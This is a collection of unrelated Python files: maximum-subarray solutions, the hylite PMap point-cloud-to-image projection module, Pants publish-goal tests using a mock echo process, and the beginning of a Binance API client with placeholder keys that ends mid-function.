# Originally a brute-force O(n^2) scan (which, per the author's note, timed
# out); replaced with Kadane's algorithm, O(n), same results.
class Solution:
    def maxSubArray(self, nums: List[int]) -> int:
        """Return the largest sum of any non-empty contiguous subarray of nums.

        Kadane's algorithm: `current` is the best sum of a subarray ending at
        the present element — at each step either extend it or restart.
        """
        best = current = nums[0]
        for value in nums[1:]:
            # Extend the running subarray, or start fresh at `value` if that is larger.
            current = max(value, current + value)
            best = max(best, current)
        return best
# A simpler O(n) solution.
class Solution:
    def maxSubArray(self, nums: List[int]) -> int:
        """Return the maximum sum over all non-empty contiguous subarrays."""
        peak = max(nums)
        # All-negative input: the best subarray is the single largest element.
        if peak < 0:
            return peak
        best = running = 0
        for value in nums:
            # Reset the running sum to zero whenever it goes negative.
            running = max(0, running + value)
            best = max(best, running)
        return best
|
"""
Projection maps store lookup tables (python dictionaries) that link PointIDs in a point cloud with pixelIDs in an image.
They store many : many relationships and can store arbitrarily complicated projections ( perspective, panoramic,
pushbroom etc.). PMaps only store the mapping function; see HyScene for functionality that pushes data between different
data types. PMaps can be saved using io.save( ... ) to avoid expensive computation multiple times in a processing
workflow.
"""
import numpy as np
from scipy.sparse import coo_matrix, csc_matrix, csr_matrix
import hylite
class PMap(object):
    """
    A class for storing lookup tables that map between 3-D point clouds and 2-D images.

    Links are stored in a scipy sparse matrix of shape (npoints, xdim*ydim) whose
    non-zero entries hold 1/z, where z is the distance between the point (row) and
    the pixel (column). Storing inverse depth means the closest link always has the
    largest matrix entry, so nearest-point / nearest-pixel queries reduce to argmax
    operations over the sparse matrix.
    """

    def __init__(self, xdim, ydim, npoints, cloud=None, image=None):
        """
        Create a new (empty) PMap object.
        *Arguments*:
         - xdim = the width of the associated image in pixels. Used for ravelling indices.
         - ydim = the height of the associated image in pixels. Used for ravelling indices.
         - npoints = the number of points that are in this map. Used for ravelling indices.
         - cloud = a link to the source cloud, default is None.
         - image = a link to the source image, default is None.
        """
        self.xdim = xdim  # width of the associated image
        self.ydim = ydim  # height of the associated image
        self.npoints = npoints
        self.cloud = cloud  # store ref to cloud if provided
        self.image = image  # store ref to image if provided
        self.points = []  # points with non-zero references in this matrix
        self.pixels = []  # pixels with non-zero references in this matrix
        self.data = coo_matrix((npoints, xdim * ydim), dtype=np.float32)  # initialise mapping matrix

    def _ridx(self, pixel):
        """
        Ravel a pixel index tuple to an integer. If an integer is passed to this function
        it will be returned directly.
        """
        if isinstance(pixel, tuple):
            assert len(pixel) == 2, "Error - (x,y) tuples must have length 2."
            pixel = np.ravel_multi_index(pixel, dims=(self.xdim, self.ydim), order='F')
        assert np.issubdtype(type(pixel), np.integer), "Error - non-integer pixel ID (%s = %s)?" % (
            pixel, type(pixel))  # always wear protection
        return pixel

    def _uidx(self, pixel):
        """
        Unravel an integer pixel index to a (x,y) tuple. If a tuple is passed to this function
        it will be returned directly.
        """
        if np.issubdtype(type(pixel), np.integer):
            pixel = np.unravel_index(pixel, (self.xdim, self.ydim), order='F')
        elif isinstance(pixel, tuple):
            pass  # already an (x, y) tuple
        else:
            assert np.issubdtype(type(pixel), np.integer), "Error - non-integer pixel ID (%s = %s)?" % (
                pixel, type(pixel))
        return pixel

    def coo(self):
        """
        Convert this pmap's internal sparse matrix to coo format.
        """
        if not isinstance(self.data, coo_matrix):
            self.data = self.data.tocoo()

    def csc(self):
        """
        Convert this pmap's internal sparse matrix to compressed column format (fast per-pixel slicing).
        """
        if not isinstance(self.data, csc_matrix):
            self.data = self.data.tocsc()

    def csr(self):
        """
        Convert this pmap's internal sparse matrix to compressed row format (fast per-point slicing).
        """
        if not isinstance(self.data, csr_matrix):
            self.data = self.data.tocsr()

    def get_flat(self):
        """
        Return three flat arrays that contain all the links in this projection map.
        *Returns*:
         - points = an (n,) list of point ids.
         - pixels = an (n,) list of pixel ids corresponding to the points above.
         - z = an (n,) list of distances between each point and corresponding pixel.
        """
        self.coo()
        return self.data.row, self.data.col, 1 / self.data.data  # invert entries (stored as 1/z) to get distances

    def set_flat(self, points, pixels, z):
        """
        Adds links to this pmap from flattened arrays as returned by get_flat( ... ).
        *Arguments*:
         - points = an (n,) list of point ids.
         - pixels = an (n,) list of pixel ids corresponding to the points above.
         - z = an (n,) array of distances between each point and corresponding pixel.
        """
        # store inverse distances so the closest link always has the largest entry
        self.data = coo_matrix((1 / z, (points, pixels)), shape=(self.npoints, self.xdim * self.ydim),
                               dtype=np.float32)

        # also store unique points and pixels
        self.points = np.unique(points)
        self.pixels = np.unique(pixels)

    def set_ppc(self, pp, vis):
        """
        Adds links to the pmap based on a projected point coordinates array and a visibility list, as returned by
        e.g. proj_persp and proj_pano.
        *Arguments*:
         - pp = projected point coordinates as returned by e.g. proj_pano.
         - vis = point visibilities, as returned by e.g. proj_pano.
        """
        # convert to indices
        pid = np.argwhere(vis)[:, 0]
        pp = pp[vis]

        # convert pixel indices to flat indices
        # (np.int was removed in NumPy 1.24; the builtin int is the documented replacement)
        pix = np.ravel_multi_index(pp[:, [0, 1]].astype(int).T, dims=(self.xdim, self.ydim), order='F')

        # set data values
        self.set_flat(pid, pix, pp[:, 2])

    def size(self):
        """
        How many point <-> pixel links are stored in this map?
        """
        return len(self.data.data)

    def point_count(self):
        """
        How many points are included in this mapping (i.e. how many points are mapped to pixels?)
        """
        return len(self.points)

    def pixel_count(self):
        """
        How many pixels are included in this mapping?
        """
        return len(self.pixels)

    def get_depth(self, pixel, point):
        """
        Get the distance between a pixel and point pair. Returns
        None if there is no mapping between the pixel and the point.
        """
        pixel = self._ridx(pixel)
        if isinstance(self.data, coo_matrix):  # coo matrices don't support indexing
            self.csc()
        inv = self.data[point, pixel]  # n.b. matrix entries are 1 / z
        if inv == 0:
            # no stored link — honour the documented contract (previously this
            # divided by zero instead of returning None)
            return None
        return 1 / inv

    def get_point_index(self, pixel):
        """
        Get the index of the closest point in the specified pixel
        *Arguments*;
         - pixel = the index of the pixel (integer or (x,y) tuple).
        *Returns*:
         - point = the point index or None if no points are in the specified pixel.
         - depth = the distance to this point.
        """
        self.csc()  # convert to column format
        C = self.data[:, self._ridx(pixel)]  # get column
        return C.nonzero()[0][np.argmax(C.data)], 1 / np.max(C.data)  # return closest point
        # n.b. note that matrix entries are 1 / z

    def get_point_indices(self, pixel):
        """
        Get the indices and depths of all points in the specified pixel.
        *Arguments*;
         - pixel = the index of the pixel (integer or (x,y) tuple).
        *Returns*:
         - points = a list of point indices, or [ ] if no points are present.
         - depths = a list of associated depths, or [ ] if no points are present.
        """
        self.csc()  # convert to column format
        C = self.data[:, self._ridx(pixel)]  # get column
        return C.nonzero()[0], 1 / C.data  # return indices and depths

    def get_pixel_index(self, point):
        """
        Get the index of the closest pixel to the specified point.
        *Arguments*;
         - point = the point index
        *Returns*:
         - (px, py) = the pixel coordinates, or None if no mapping exists
         - depth = the distance to this pixel.
        """
        self.csr()  # convert to row format
        R = self.data[point, :]  # get row
        return self._uidx(R.nonzero()[1][np.argmax(R.data)]), 1 / np.max(R.data)  # closest pixel and depth

    def get_pixel_indices(self, point):
        """
        Get a list of pixel coordinates associated with the specified point.
        *Arguments*:
         - point = the point index
        *Returns*:
         - pixels = a list of (n,2) containing pixel coordinates.
         - depths = a list of (n,) containing associated distances.
        """
        self.csr()  # convert to row format
        R = self.data[point, :]  # get row
        # n.b. entries are 1 / z, so invert them to return true distances — this
        # matches the docstring and the sibling get_point_indices (previously the
        # raw inverse depths were returned here).
        return np.array(np.unravel_index(R.nonzero()[1], (self.xdim, self.ydim), order='F')).T, 1 / R.data

    def get_pixel_depths(self):
        """
        Return a (xdim,ydim) array containing the depth to the closest point in each pixel. Pixels with no points
        will be given 0 values.
        """
        out = (1 / np.max(self.data, axis=0).toarray()).astype(np.float32)  # 1 / largest inverse depth = closest z
        out[np.logical_not(np.isfinite(out))] = 0  # empty pixels divide by zero above; zero them out
        return out.reshape(self.xdim, self.ydim, order='F')

    def get_point_depths(self):
        """
        Return a (npoints,) array containing the depth to the closest pixel from each point. Points with no
        pixels will be given 0 values.
        """
        out = (1 / np.max(self.data, axis=1).toarray()).astype(np.float32)
        out[np.logical_not(np.isfinite(out))] = 0  # points with no pixels divide by zero above; zero them out
        return out

    def points_per_pixel(self):
        """
        Calculate how many points are in each pixel.
        Returns:
         - a HyImage instance containing point counts per pixel.
        """
        self.csr()  # use row-compressed form
        W = (self.data > 0).astype(np.float32)  # convert to binary adjacency matrix
        npnt = np.array(W.sum(axis=0)).ravel()  # get number of points per pixel
        return hylite.HyImage(npnt.reshape((self.xdim, self.ydim, 1), order='F'))

    def pixels_per_point(self):
        """
        Calculates how many pixels project to each point.
        Returns:
         - a copy of self.cloud, but with a scalar field containing pixel counts per point. If self.cloud is not
           defined then a numpy array of pixel counts will be returned.
        """
        self.csc()  # use column compressed form
        W = (self.data > 0).astype(np.float32)  # convert to binary adjacency matrix
        npix = np.array(W.sum(axis=1)).ravel()  # get number of pixels per point
        if self.cloud is not None:  # return a cloud
            out = self.cloud.copy(data=False)
            out.data = npix[:, None]
            return out
        else:
            return npix  # return a numpy array

    def intersect(self, map2):
        """
        Get point indices that exist (are visible in) this scene and another.
        *Arguments*:
         - map2 = a PMap instance that references the same cloud but with a different image/viewpoint.
        *Returns*:
         - indices = a list of point indices that are visible in both scenes.
        """
        S1 = set(self.points)
        S2 = set(map2.points)
        return list(S1 & S2)

    def union(self, maps):
        """
        Returns points that are included in one or more of the passed PMaps.
        *Arguments*:
         - maps = a list of pmap instances to compare with (or just one).
        *Returns*:
         - indices = a set of point indices that are visible in any of the scenes (including this one).
        """
        if not isinstance(maps, list):
            maps = [maps]
        S_n = [set(s.points) for s in maps]
        S1 = set(self.points)
        return S1.union(*S_n)

    def intersect_pixels(self, map2):
        """
        Identifies matching pixels between two scenes.
        *Arguments*:
         - map2 = the scene to match against this one
        *Returns*:
         - px1 = a numpy array of (x,y) pixel coordinates in this scene.
         - px2 = a numpy array of corresponding (x,y) pixel coordinates in scene 2.
        """
        px1 = []
        px2 = []
        overlap = self.intersect(map2)  # get points visible in both
        for idx in overlap:
            # pair every pixel of this point in scene 1 with every pixel of it in scene 2
            for _px1 in self.get_pixel_indices(idx)[0]:
                for _px2 in map2.get_pixel_indices(idx)[0]:
                    px1.append(_px1)
                    px2.append(_px2)
        return np.array(px1), np.array(px2)

    def remove_nan_pixels(self, image=None):
        """
        Removes mappings to nan pixels from linkage matrix.
        *Arguments*:
         - image = the image containing nan pixels that should be removed. Default is self.image.
        """
        self.csc()  # change to column format
        if image is None:
            image = self.image

        # build list of nan columns (pixels with any non-finite band value)
        isnan = np.logical_not(np.isfinite(image.data).all(axis=-1)).ravel(order='F')
        f = np.ones(isnan.shape[0])
        f[isnan] = 0

        # zero elements in these columns
        self.data = self.data.multiply(f)

        # remove zero elements
        self.data.eliminate_zeros()

    def filter_footprint(self, thresh=50):
        """
        Filter projections in a PMap instance and remove pixels that have a
        on-ground footprint above the specified threshold. This operation is
        applied in-place to conserve memory.
        *Arguments*:
         - thresh = the maximum allowable pixel footprint (in points). Pixels containing > than
                    this number of points will be removed from the projection map.
        """
        # calculate footprint
        W = (self.data > 0).astype(np.float32)  # convert to binary adjacency matrix
        n = np.array(W.sum(axis=0)).ravel()  # get number of points per pixel
        # if isinstance(thresh, int): # calculate threshold as percentile if need be
        #    thresh = np.percentile( n[ n > 0], thresh )

        # convert to coo format
        self.coo()

        # rebuild mapping matrix, keeping only links whose pixel footprint is under the threshold
        # NOTE(review): self.points / self.pixels are not refreshed here and may become stale — confirm intended.
        mask = n[self.data.col] < thresh  # valid points
        self.data = coo_matrix((self.data.data[mask], (self.data.row[mask], self.data.col[mask])),
                               shape=(self.npoints, self.xdim * self.ydim), dtype=np.float32)

    def filter_occlusions(self, occ_tol=5.):
        """
        Filter projections in a PMap instance and remove points that are likely to be
        occluded. This operation is applied in-place to conserve memory.
        *Arguments*:
         - occ_tol = the tolerance of the occlusion culling. Points within this distance of the
                     closest point in each pixel will be retained.
        """
        zz = np.max(self.data, axis=0).power(-1)  # calculate closest point in each pixel
        zz.data += occ_tol  # allow points within occ_tol of the closest
        zz = zz.tocsc()
        self.coo()

        # rebuild mapping matrix, keeping only points closer than (closest + occ_tol)
        mask = self.data.data > (1 / zz[0, self.data.col].toarray()[0, :])  # which points to include
        self.data = coo_matrix((self.data.data[mask], (self.data.row[mask], self.data.col[mask])),
                               shape=(self.npoints, self.xdim * self.ydim), dtype=np.float32)
def _gather_bands(data, bands):
    """
    Utility function used by push_to_image( ... ) and push_to_cloud( ... ) to slice data from a HyData instance.

    *Arguments*:
     - data = the HyData instance (cloud or image) to pull bands from.
     - bands = an iterable of band descriptors. Each element may be: a string of per-point
               attribute flags ('r','g','b' = colour, 'x','y','z' = position, 'k','l','m' = normal),
               a (start, end) tuple defining a slice of bands, or a single band index (int) /
               wavelength (float).
    *Returns*:
     - data = a data array containing the requested bands (hopefully).
     - wav = the wavelengths of the extracted bands (or -1 for non-spectral attributes).
     - names = the names of the extracted bands.
    """
    # accumulators for band data, wavelengths and band names
    dat = []
    wav = []
    nam = []

    # loop through bands tuple/list and extract data indices/slices
    for e in bands:
        # extract from point cloud based on string
        if isinstance(e, str):
            for c in e.lower():
                if c == 'r':
                    assert data.has_rgb(), "Error - RGB information not found."
                    dat.append(data.rgb[..., 0])
                    nam.append('r')
                    wav.append(hylite.RGB[0])
                elif c == 'g':
                    assert data.has_rgb(), "Error - RGB information not found."
                    dat.append(data.rgb[..., 1])
                    nam.append('g')
                    wav.append(hylite.RGB[1])
                elif c == 'b':
                    assert data.has_rgb(), "Error - RGB information not found."
                    dat.append(data.rgb[..., 2])
                    nam.append('b')
                    wav.append(hylite.RGB[2])
                elif c == 'x':
                    dat.append(data.xyz[..., 0])
                    nam.append('x')
                    wav.append(-1)  # -1 flags a non-spectral attribute
                elif c == 'y':
                    dat.append(data.xyz[..., 1])
                    nam.append('y')
                    wav.append(-1)
                elif c == 'z':
                    dat.append(data.xyz[..., 2])
                    nam.append('z')
                    wav.append(-1)
                elif c == 'k':
                    assert data.has_normals(), "Error - normals not found."
                    dat.append(data.normals[..., 0])
                    nam.append('k')
                    wav.append(-1)
                elif c == 'l':
                    assert data.has_normals(), "Error - normals not found."
                    dat.append(data.normals[..., 1])
                    nam.append('l')
                    wav.append(-1)
                elif c == 'm':
                    assert data.has_normals(), "Error - normals not found."
                    dat.append(data.normals[..., 2])
                    nam.append('m')
                    wav.append(-1)
        # extract slice
        elif isinstance(e, tuple):
            assert len(e) == 2, "Error - band slices must be tuples of length two."
            idx0 = data.get_band_index(e[0])
            idx1 = data.get_band_index(e[1])
            dat += [data.data[..., b] for b in range(idx0, idx1)]
            if data.has_band_names():
                nam += [data.get_band_names()[b] for b in range(idx0, idx1)]
            else:
                nam += [str(b) for b in range(idx0, idx1)]
            if data.has_wavelengths():
                wav += [data.get_wavelengths()[b] for b in range(idx0, idx1)]
            else:
                wav += [float(b) for b in range(idx0, idx1)]
        # extract band based on index or wavelength
        elif isinstance(e, float) or isinstance(e, int):
            b = data.get_band_index(e)
            # NOTE(review): this indexes the HyData object directly, whereas the
            # tuple branch above uses data.data[..., b] — confirm HyData.__getitem__
            # supports this, otherwise this should also be data.data[..., b].
            dat.append(data[..., b])
            if data.has_band_names():
                nam.append(data.get_band_names()[b])
            else:
                nam.append(str(b))
            if data.has_wavelengths():
                wav.append(data.get_wavelengths()[b])
            else:
                wav.append(float(b))
        else:
            # bugfix: this previously formatted the message with `b`, which is
            # unbound unless a numeric descriptor was seen earlier — raising a
            # NameError instead of the intended assertion message.
            assert False, "Unrecognised band descriptor %s" % e

    # stack the gathered bands into an image (y,x,b) or cloud (n,b) array
    if data.is_image():
        dat = np.dstack(dat)  # stack
    else:
        dat = np.vstack(dat).T
    return dat, wav, nam
def push_to_cloud(pmap, bands=(0, -1), method='best', image=None, cloud=None ):
    """
    Push the specified bands from an image onto a hypercloud using a (precalculated) PMap instance.

    *Arguments*:
     - pmap = a pmap instance. the pmap.image and pmap.cloud references must also be defined.
     - bands = List defining the bands to include in the output dataset. Elements should be one of:
          - numeric = index (int), wavelength (float) of an image band
          - tuple of length 2: start and end bands (float or integer) to export.
          - iterable of length > 2: list of bands (float or integer) to export.
     - method = The method used to condense data from multiple pixels onto each point. Options are:
          - 'closest': use the closest pixel to each point.
          - 'distance': average with inverse distance weighting.
          - 'count' : average weighted inverse to the number of points in each pixel.
          - 'best' : use the pixel that is mapped to the fewest points (only). Default.
          - 'average' : average with all pixels weighted equally.
     - image = the image to project (if different to pmap.image). Must have matching dimensions. Default is pmap.image.
     - cloud = the cloud to project (if different to pmap.cloud). Must have matching dimensions. Default is pmap.cloud.
    *Returns*:
     - A HyCloud instance containing the back-projected data.
    """
    if image is None:
        image = pmap.image
    if cloud is None:
        cloud = pmap.cloud
    # get image array of data to copy across
    data = image.export_bands(bands)
    # flatten to (npixels, nbands); explicit order='F' so flat pixel ids match the
    # pmap's ravelled indices (n.b. we deliberately don't use data.X() here)
    X = data.data.reshape(-1, data.data.shape[-1], order='F')
    # convert pmap to csc format
    pmap.csc()  # NOTE(review): csr might be faster for the row-wise sums below — unverified
    pmap.remove_nan_pixels()  # drop links to nan pixels so they don't pollute the averages
    # build weights matrix W (npoints x npixels) and per-point weight sums n
    if 'closest' in method.lower():
        # get closest pixels
        closest = np.argmax(pmap.data, axis=1)  # find closest pixel to each point (largest 1/z along cols)
        # assemble sparse matrix with closest pixels scored as 1
        # NOTE(review): the `> 0` test drops points whose closest pixel is column 0
        # (flat index 0) — presumably an accepted edge case; confirm.
        rows = np.argwhere(closest > 0)[:, 0]
        cols = np.array(closest[rows])[:, 0]
        vals = np.ones(rows.shape)
        W = csc_matrix((vals, (rows, cols)), pmap.data.shape, dtype=np.float32)
        # sum of weights is easy (one pixel per point)
        n = np.ones(pmap.npoints, dtype=np.float32)
    elif 'average' in method.lower():
        W = (pmap.data > 0).astype(np.float32)  # weights matrix [ full of ones ]
        n = np.array(W.sum(axis=1))[:, 0]  # sum of weights (for normalising later)
    elif 'count' in method.lower() or 'best' in method.lower():
        W = (pmap.data > 0).astype(np.float32)  # convert to binary adjacency matrix
        npoints = np.array(W.sum(axis=0))[0, :]  # get number of points per pixel
        W = W.multiply(1 / npoints)  # fill non-zero values with 1 / points in relevant pixel
        if 'best' in method.lower():  # filter W so we keep only the best points
            best = np.argmax(W, axis=1)  # assemble sparse matrix with best pixels scored as 1
            rows = np.argwhere(best > 0)[:, 0]
            cols = np.array(best[rows])[:, 0]
            vals = np.ones(rows.shape)
            W = csc_matrix((vals, (rows, cols)), pmap.data.shape, dtype=np.float32)
        n = np.array(W.sum(axis=1))[:, 0]  # sum of weights (for normalising later)
    elif 'distance' in method.lower():
        W = pmap.data  # easy! entries are already 1/z, i.e. inverse-distance weights
        n = np.array(W.sum(axis=1))[:, 0]  # sum of weights (for normalising later)
    else:
        assert False, "Error - %s is an invalid method." % method
    # calculate output: weighted average of pixel values for each point
    #V = W.dot(X) / n[:, None]
    V = W@X / n[:, None]
    # build output cloud
    out = cloud.copy(data=False)
    out.data = V
    if data.has_wavelengths():
        out.set_wavelengths(data.get_wavelengths())
    return out
def push_to_image(pmap, bands='xyz', method='closest', image=None, cloud=None):
    """
    Project the specified data from a point cloud onto an image using a (precalculated) PMap instance. If multiple points map
    to a single pixel then the results are averaged.

    *Arguments*:
     - pmap = a pmap instance. the pmap.image and pmap.cloud references must also be defined.
     - bands = List defining the bands to include in the output dataset. Elements should be one of:
          - numeric = index (int), wavelength (float) of an image band
          - bands = a list of image band indices (int) or wavelengths (float). Inherent properties of point clouds
                    can also be expected by passing any combination of the following:
                - 'rgb' = red, green and blue per-point colour values
                - 'klm' = point normals
                - 'xyz' = point coordinates
          - iterable of length > 2: list of bands (float or integer) to export.
     - method = The method used to condense data from multiple points onto each pixel. Options are:
          - 'closest': use the closest point to each pixel (default is this is fastest).
          - 'average' : average with all pixels weighted equally. Slow.
     - image = the image to project (if different to pmap.image). Must have matching dimensions. Default is pmap.image.
     - cloud = the cloud to project (if different to pmap.cloud). Must have matching dimensions. Default is pmap.cloud.
    *Returns*:
     - A HyImage instance containing the projected data.
    """
    if image is None:
        image = pmap.image
    if cloud is None:
        cloud = pmap.cloud
    # special case: individual band; wrap in list
    if isinstance(bands, int) or isinstance(bands, float) or isinstance(bands, str):
        bands = [bands]
    # special case: tuple of two bands; treat as slice
    if isinstance(bands, tuple) and len(bands) == 2:
        bands = [bands]
    # gather data to project
    dat, wav, nam = _gather_bands(cloud, bands)  # extract the requested per-point attributes/bands
    # convert pmap to csr format
    # pmap.csr()
    # build weights matrix
    if 'closest' in method.lower():
        # n.b. unlike push_to_cloud, `closest` here is already flattened to 1-D, so no [:, 0] below
        closest = np.array(np.argmax(pmap.data, axis=0))[0,
                  :]  # find closest point to each pixel (largest 1/z along rows)
        # assemble sparse matrix with closest points scored as 1
        # NOTE(review): the `> 0` test drops pixels whose closest point is row 0 — confirm intended.
        cols = np.argwhere(closest > 0)[:, 0]
        rows = np.array(closest[cols])
        vals = np.ones(rows.shape)
        W = csc_matrix((vals, (rows, cols)), pmap.data.shape, dtype=np.float32)
        #V = W.T.dot(dat) # project closest poits
        V = W.T@dat # project closest poits
    elif 'average' in method.lower():
        W = (pmap.data > 0).astype(np.float32)  # weights matrix [ full of ones ]
        n = np.array(W.sum(axis=0))[0, :]  # sum of weights
        #V = W.T.dot(dat) / n[:, None] # calculate average
        V = W.T@dat / n[:, None] # calculate average
    else:
        assert False, "Error - %s is an invalid method for cloud_to_image." % method
    # build output image (unflatten the pixel axis back to xdim x ydim)
    out = image.copy(data=False)
    out.data = np.reshape(V, (image.xdim(), image.ydim(), -1), order='F')
    out.data[out.data == 0] = np.nan  # replace zeros with nans
    out.set_wavelengths(wav)
    out.set_band_names(nam)
    return out
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
from dataclasses import dataclass
from textwrap import dedent
import pytest
from pants.backend.python.goals import package_dists
from pants.backend.python.macros.python_artifact import PythonArtifact
from pants.backend.python.target_types import PythonDistribution, PythonSourcesGeneratorTarget
from pants.backend.python.target_types_rules import rules as python_target_type_rules
from pants.core.goals import package, publish
from pants.core.goals.publish import (
Publish,
PublishFieldSet,
PublishPackages,
PublishProcesses,
PublishRequest,
)
from pants.engine.process import InteractiveProcess
from pants.engine.rules import rule
from pants.engine.target import StringSequenceField
from pants.testutil.rule_runner import RuleRunner
class MockRepositoriesField(StringSequenceField):
    # Stand-in for a real "repositories" field so test targets can declare repos.
    alias = "repositories"
@dataclass(frozen=True)
class MockPublishRequest(PublishRequest):
    # No extra fields needed; the PublishRequest base carries the built packages.
    pass
@dataclass(frozen=True)
class PublishTestFieldSet(PublishFieldSet):
    # Connect the mock request type to any target that declares the mock field.
    publish_request_type = MockPublishRequest
    required_fields = (MockRepositoriesField,)
    repositories: MockRepositoriesField
@rule
async def mock_publish(request: MockPublishRequest) -> PublishProcesses:
    """Fabricate one PublishPackages entry per configured repository.

    A repository named "skip" yields a process-less entry (a skipped publish
    described as "(requested)"); any other repository gets a trivial `echo`
    InteractiveProcess.
    """
    repos = request.field_set.repositories.value
    if not repos:
        return PublishProcesses()
    package_names = tuple(
        artifact.relpath
        for pkg in request.packages
        for artifact in pkg.artifacts
        if artifact.relpath
    )
    entries = []
    for repo in repos:
        skip = repo == "skip"
        entries.append(
            PublishPackages(
                names=package_names,
                process=None if skip else InteractiveProcess(["echo", repo]),
                description="(requested)" if skip else repo,
            )
        )
    return PublishProcesses(entries)
@pytest.fixture
def rule_runner() -> RuleRunner:
    # Assemble a RuleRunner with the package/publish goal rules plus the mock
    # publish backend defined above.
    return RuleRunner(
        rules=[
            *package.rules(),
            *publish.rules(),
            *package_dists.rules(),
            *python_target_type_rules(),
            mock_publish,
            # Expose the mock `repositories` field on python_distribution targets.
            PythonDistribution.register_plugin_field(MockRepositoriesField),
            *PublishTestFieldSet.rules(),
        ],
        target_types=[PythonSourcesGeneratorTarget, PythonDistribution],
        objects={"python_artifact": PythonArtifact},
    )
def test_noop(rule_runner: RuleRunner) -> None:
    """A distribution with no `repositories` value should publish nothing."""
    build_file = dedent(
        """\
        python_sources()
        python_distribution(
            name="dist",
            provides=python_artifact(
                name="my-package",
                version="0.1.0",
            ),
        )
        """
    )
    rule_runner.write_files({"src/BUILD": build_file})
    result = rule_runner.run_goal_rule(
        Publish,
        args=("src:dist",),
        env_inherit={"HOME", "PATH", "PYENV_ROOT"},
    )
    assert result.exit_code == 0
    assert "Nothing published." in result.stderr
def test_skipped_publish(rule_runner: RuleRunner) -> None:
    """A repository named "skip" yields a process-less (skipped) publish entry."""
    rule_runner.write_files(
        {
            "src/BUILD": dedent(
                """\
                python_sources()
                python_distribution(
                    name="dist",
                    provides=python_artifact(
                        name="my-package",
                        version="0.1.0",
                    ),
                    repositories=["skip"],
                )
                """
            ),
        }
    )
    result = rule_runner.run_goal_rule(
        Publish,
        args=("src:dist",),
        env_inherit={"HOME", "PATH", "PYENV_ROOT"},
    )
    # Both built artifacts (sdist and wheel) should be reported as skipped.
    assert result.exit_code == 0
    assert "my-package-0.1.0.tar.gz skipped (requested)." in result.stderr
    assert "my_package-0.1.0-py3-none-any.whl skipped (requested)." in result.stderr
def test_structured_output(rule_runner: RuleRunner) -> None:
    """`--output` should write a JSON summary of the publish results to disk."""
    rule_runner.write_files(
        {
            "src/BUILD": dedent(
                """\
                python_sources()
                python_distribution(
                    name="dist",
                    provides=python_artifact(
                        name="my-package",
                        version="0.1.0",
                    ),
                    repositories=["skip"],
                )
                """
            ),
        }
    )
    result = rule_runner.run_goal_rule(
        Publish,
        args=(
            "--output=published.json",
            "src:dist",
        ),
        env_inherit={"HOME", "PATH", "PYENV_ROOT"},
    )
    assert result.exit_code == 0
    assert "my-package-0.1.0.tar.gz skipped (requested)." in result.stderr
    assert "my_package-0.1.0-py3-none-any.whl skipped (requested)." in result.stderr
    # The structured output groups both artifacts under one skipped entry.
    expected = [
        {
            "names": [
                "my-package-0.1.0.tar.gz",
                "my_package-0.1.0-py3-none-any.whl",
            ],
            "published": False,
            "status": "skipped (requested)",
            "target": "src:dist",
        },
    ]
    with open("published.json") as fd:
        data = json.load(fd)
    assert data == expected
@pytest.mark.skip("Can not run interactive process from test..?")
@pytest.mark.no_error_if_skipped
def test_mocked_publish(rule_runner: RuleRunner) -> None:
    """A non-"skip" repository should run the mock `echo` process and publish."""
    rule_runner.write_files(
        {
            "src/BUILD": dedent(
                """\
                python_sources()
                python_distribution(
                    name="dist",
                    provides=python_artifact(
                        name="my-package",
                        version="0.1.0",
                    ),
                    repositories=["mocked-repo"],
                )
                """
            ),
        }
    )
    result = rule_runner.run_goal_rule(
        Publish,
        args=("src:dist",),
        env_inherit={"HOME", "PATH", "PYENV_ROOT"},
    )
    assert result.exit_code == 0
    assert "my-package-0.1.0.tar.gz published." in result.stderr
    assert "my_package-0.1.0-py3-none-any.whl published." in result.stderr
    # The `echo mocked-repo` InteractiveProcess output lands on stdout.
    assert "mocked-repo" in result.stdout
|
import requests
import hmac
import hashlib
import base64
import time
token = "YOUR TOKEN"
secretKey = b"YOUR SECRETKEY"
baseURL = "https://api.binance.com"
pingURL = "/api/v1/ping"
timeURL = "/api/v1/time"
bookURL = "/api/v1/depth"
recentTradeURL = "/api/v1/trades"
historicalTradeURL = "/api/v1/historicalTrades"
rangeTradeURL = "/api/v1/aggTrades"
candlestickURL = "/api/v1/klines"
dayURL="/api/v1/ticker/24hr"
priceURL = "/api/v3/ticker/price"
bookTickerURL="/api/v3/ticker/bookTicker"
testNewOrderURL = "/api/v3/order/test"
orderURL="/api/v3/order"
openOrdersURL="/api/v3/openOrders"
allOrdersURL="/api/v3/allOrders"
accountInfoURL="/api/v3/account"
accountTradesURL="/api/v3/myTrades"
######API CALLS
def getSignature(message, key):
    """Return the hex-encoded HMAC-SHA256 signature of *message* signed with *key*.

    Both arguments must be bytes; used to sign authenticated Binance requests.
    """
    return hmac.new(key, msg=message, digestmod=hashlib.sha256).hexdigest()
def checkStatus():
    """Return True if the Binance API answers the ping endpoint with HTTP 200."""
    response = requests.get(baseURL + pingURL)
    return response.status_code == 200
def getTimestamp():
    """Return the Binance server time (milliseconds since epoch)."""
    payload = requests.get(baseURL + timeURL).json()
    return payload['serverTime']
def getOrderBook(symbol, limit=None):
    """Fetch the current order book for *symbol* (optionally capped at *limit* levels)."""
    query = {"symbol": symbol, "limit": limit}
    return requests.get(baseURL + bookURL, params=query).json()
def getRecentTrades(symbol, limit=None):
    """Fetch the most recent trades for *symbol* (optionally capped at *limit*)."""
    query = {"symbol": symbol, "limit": limit}
    return requests.get(baseURL + recentTradeURL, params=query).json()
def getHistoricalTrade(token, symbol, limit=None, fromId=None):
    """Fetch older trades for *symbol*; requires an API key header."""
    query = {"symbol": symbol, "limit": limit, "fromId": fromId}
    return requests.get(baseURL + historicalTradeURL, headers={"X-MBX-APIKEY": token}, params=query).json()
def getTradesByTimeRange(token, symbol, startTime=None, endTime=None, limit=None, fromId=None):
    """Fetch aggregate trades for *symbol*, optionally restricted to [startTime, endTime]."""
    query = {
        "symbol": symbol,
        "limit": limit,
        "fromId": fromId,
        "startTime": startTime,
        "endTime": endTime,
    }
    return requests.get(baseURL + rangeTradeURL, headers={"X-MBX-APIKEY": token}, params=query).json()
def getCandleStick(token, symbol, interval, limit=None, startTime=None, endTime=None):
    """Fetch kline/candlestick data for *symbol*.

    Valid *interval* values:
    "1m","3m","5m","15m","30m","1h","2h","4h","6h","8h","12h","1d","3d","1w","1M"
    """
    query = {
        "symbol": symbol,
        "limit": limit,
        "interval": interval,
        "startTime": startTime,
        "endTime": endTime,
    }
